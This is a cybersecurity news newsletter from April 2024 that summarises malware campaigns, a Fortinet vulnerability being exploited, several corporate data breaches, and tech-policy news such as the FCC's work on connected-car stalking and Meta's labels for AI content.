Cyber Briefing: 2024.04.09

?? What's the latest in the cyber world today?

Obfuscation Tools, Multi-Stage Malware, Invoice Phishing, Youtube Channels, Infostealer Malware, WordPress Sites, Crypto Pop-up Scams, Ahoi Attacks, Fortinet Vulnerability, RMM Tools, Backdoors, 家得宝 , boAt, GREYLOCK MCKINNON ASSOCIATES, INC , U.S. Department of Justice , Targus , U.S. Securities and Exchange Commission , Philippines, US Federal Communications Commission , Connected Car Stalking, Meta , AI-Generated Content, 微软 , London Office, 苹果 Job Lay off, 谷歌 , Android Users.

Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.

First time seeing this? Please subscribe.

?? Cyber Alerts

1. VenomRAT Invoice Phishing Attack

Cybersecurity experts unveil an intricate attack utilizing invoice-themed phishing lures to deploy Venom RAT, Remcos RAT, XWorm, NanoCore RAT, and a crypto wallet stealer. Email attachments containing SVG files trigger the infection sequence, as revealed by Fortinet FortiGuard Labs. The attackers employ sophisticated obfuscation techniques like BatCloak and ScrubCrypt, showcasing a versatile and adaptable assault methodology.

2. YouTube Channels Hacked for Malware

Hackers target renowned YouTube channels to exploit their vast audience and monetize through ransom demands and illicit ad revenues. These channels serve as potent tools for spreading malware and propaganda, as discovered by cybersecurity researchers at ASEC. Popular channels, spanning various genres, have become prime targets for large-scale attacks, amplifying the threat posed by infostealer malware like Vidar and LummaC2.

3. Crypto Pop-up Scams on WordPress

Hackers exploit nearly 2,000 hacked WordPress sites, luring visitors with fake NFT and discount pop-ups to steal crypto funds. Initially compromising 1,000 sites for crypto drainers, attackers now employ malicious scripts to brute-force admin passwords on other sites. Pop-ups entice users to connect wallets, leading to theft of funds and NFTs, emphasizing the need for vigilance in online interactions.

4. VMs Compromised by Ahoi Attacks

ETH Zurich researchers unveil Ahoi attacks targeting cloud-based confidential virtual machines (CVMs), exploiting vulnerabilities in AMD SEV-SNP and Intel TDX technologies. Through malicious hypervisors injecting interrupts, attackers can compromise CVM integrity and gain root access. Despite Linux kernel patches and mitigations, cloud vendors like AWS and Google face varying impacts, urging heightened security measures.

5. Fortinet Vulnerability Exploit Alert

Threat actors leverage Fortinet Forticlient EMS vulnerability (CVE-2023-48788) to implant unauthorized RMM tools and PowerShell backdoors. Exploiting an external network connection, they download and execute malicious payloads, exploiting SQL injection to execute SYSTEM-level commands. Fortinet has patched the vulnerability (severity 9.8), but vigilance and immediate updates are crucial for protection.

?? Cyber Incidents

6. Home Depot Employee Data Breach

Home Depot confirms exposure of 10,000 employees' data, raising concerns over targeted phishing risks. The breach, facilitated by a third-party software provider's accidental data exposure, underscores the vulnerability large corporations face with third-party suppliers. This incident highlights the critical need for robust cybersecurity measures in safeguarding sensitive employee information from unauthorized access and exploitation.

7. boAt Hit by Massive Data Breach

Over 7.5 million boAt customers' personal data was compromised, posing grave risks and highlighting data security concerns. Hacker ShopifyGUY dumps 2GB of PII on the dark web, including names, addresses, and contact details. The breach threatens customer privacy and demands urgent action from boAt Lifestyle.

8. Consulting Firm Cyberattack Exposes DOJ Data

Medicare and personal info of 341,000 leaked in a cyberattack on a DOJ-affiliated consulting firm. Greylock McKinnon Associates reported the breach, revealing sensitive details accessed, including Social Security numbers and medical data. Despite efforts to delete compromised data, questions remain about the extent of the breach's impact.

9. Targus Cyberattack Disrupts Operations

Targus, renowned for laptop and tablet accessories, faces a cyberattack, halting operations after hackers breached file servers. Parent company B. Riley Financial INC. discloses the incident, highlighting proactive containment measures initiated by Targus to mitigate unauthorized access. While the attack has been contained, recovery efforts with external cybersecurity experts are ongoing.

10. Philippines Probes BOC Data Breach

The Department of Information and Communications Technology (DICT) initiates an investigation into the recent data breach affecting the Bureau of Customs (BOC) in the Philippines, orchestrated by hackers identified as DeathNote Hackers PH and others. With over 2,200 employees and 80,000 customers' personal data compromised, the breach underscores systemic vulnerabilities within BOC's cybersecurity framework, Deep Web Konek warned.

?? Cyber News

11. US FCC Investigates Car Stalking

The Federal Communications Commission (FCC) initiates formal proceedings to prevent connected car stalking, particularly targeting survivors of domestic violence. The agency seeks to ensure automakers and service providers actively assist abuse survivors, building on the 2022 Safe Connections Act enforcement efforts. Proposed rules may designate connected cars as MVNOs, enhancing FCC's regulatory powers and mandating transparency in data practices to safeguard survivors.

12. Meta Implements AI Content Policy

Meta introduces a policy requiring content creators to self-declare if they used generative AI for their audio, video, and image content. This shift follows recommendations from the Meta Oversight Board to update policies regarding manipulated media, aiming to provide users with more context and transparency on potentially deceptive content. Despite concerns about misleading information, Meta argues that labeling AI-generated content rather than removing it entirely allows users to make more informed decisions and mitigates risks associated with censorship.

13. Microsoft's London AI Hub

Mustafa Suleyman, former co-founder of Google DeepMind and now CEO of Microsoft AI, has announced the opening of a new hub in London. This hub aims to advance language models and infrastructure and collaborate closely with AI teams across Microsoft and its partners. Headed by AI scientist Jordan Hoffman, the office signifies a significant investment in the UK's AI talent pool.

14. Apple Lays Off 600 Employees

Amid the termination of its ambitious self-driving car initiative, Project Titan, Apple has reportedly laid off over 600 employees in California, including those involved in car and smartwatch display projects. The company's decision to shut down Project Titan after a decade-long effort marks a significant shift in its strategic focus, potentially redirecting resources toward other endeavors like artificial intelligence. This move underscores the challenges and uncertainties inherent in pioneering efforts to enter new industries, as seen in recent layoffs across various tech giants.

15. Enhanced Android Tracking Network

Google introduces upgraded Find My Device network for Android users in the US and Canada, enabling location tracking even when devices are offline or have dead batteries. The network leverages Bluetooth proximity from over one billion active Android devices to locate lost phones and tablets. Soon, users will be able to track other items equipped with compatible Bluetooth tracker tags.

Subscribe and Comment.

Copyright ? 2024 CyberMaterial. All Rights Reserved.

Follow CyberMaterial on:

LinkedIn, Twitter, Reddit, Instagram, Facebook, YouTube, and Medium.